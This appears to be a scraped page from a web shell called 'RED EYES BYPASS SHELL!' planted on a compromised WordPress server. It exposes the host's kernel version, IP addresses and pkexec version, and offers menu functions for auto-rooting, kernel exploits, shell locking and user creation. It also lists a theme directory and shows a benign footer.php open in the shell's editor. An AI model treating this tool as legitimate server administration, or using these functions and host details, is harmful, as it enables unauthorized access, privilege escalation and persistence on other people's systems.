Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentysixteen /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
867
B
-rwxr-xr-x
archive.php
1.99
KB
-rwxr-xr-x
comments.php
1.93
KB
-rwxr-xr-x
footer.php
2.04
KB
-rwxr-xr-x
functions.php
19.06
KB
-rwxr-xr-x
header.php
4.46
KB
-rwxr-xr-x
image.php
3.58
KB
-rwxr-xr-x
index.php
1.84
KB
-rwxr-xr-x
page.php
968
B
-rwxr-xr-x
readme.txt
6.64
KB
-rwxr-xr-x
rtl.css
12.67
KB
-rwxr-xr-x
screenshot.png
452.69
KB
-rwxr-xr-x
search.php
1.56
KB
-rwxr-xr-x
searchform.php
864
B
-rwxr-xr-x
sidebar-content-bottom.php
773
B
-rwxr-xr-x
sidebar.php
369
B
-rwxr-xr-x
single.php
1.79
KB
-rwxr-xr-x
style.css
69.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after * * @package WordPress * @subpackage Twenty_Sixteen * @since Twenty Sixteen 1.0 */ ?> </div><!-- .site-content --> <footer id="colophon" class="site-footer"> <?php if ( has_nav_menu( 'primary' ) ) : ?> <nav class="main-navigation" aria-label="<?php esc_attr_e( 'Footer Primary Menu', 'twentysixteen' ); ?>"> <?php wp_nav_menu( array( 'theme_location' => 'primary', 'menu_class' => 'primary-menu', ) ); ?> </nav><!-- .main-navigation --> <?php endif; ?> <?php if ( has_nav_menu( 'social' ) ) : ?> <nav class="social-navigation" aria-label="<?php esc_attr_e( 'Footer Social Links Menu', 'twentysixteen' ); ?>"> <?php wp_nav_menu( array( 'theme_location' => 'social', 'menu_class' => 'social-links-menu', 'depth' => 1, 'link_before' => '<span class="screen-reader-text">', 'link_after' => '</span>', ) ); ?> </nav><!-- .social-navigation --> <?php endif; ?> <div class="site-info"> <?php /** * Fires before the twentysixteen footer text for footer customization. * * @since Twenty Sixteen 1.0 */ do_action( 'twentysixteen_credits' ); ?> <span class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></span> <?php if ( function_exists( 'the_privacy_policy_link' ) ) { the_privacy_policy_link( '', '<span role="separator" aria-hidden="true"></span>' ); } ?> <a href="<?php echo esc_url( __( 'https://wordpress.org/', 'twentysixteen' ) ); ?>" class="imprint"> <?php /* translators: %s: WordPress */ printf( __( 'Proudly powered by %s', 'twentysixteen' ), 'WordPress' ); ?> </a> </div><!-- .site-info --> </footer><!-- .site-footer --> </div><!-- .site-inner --> </div><!-- .site --> <?php wp_footer(); ?> </body> </html>
Close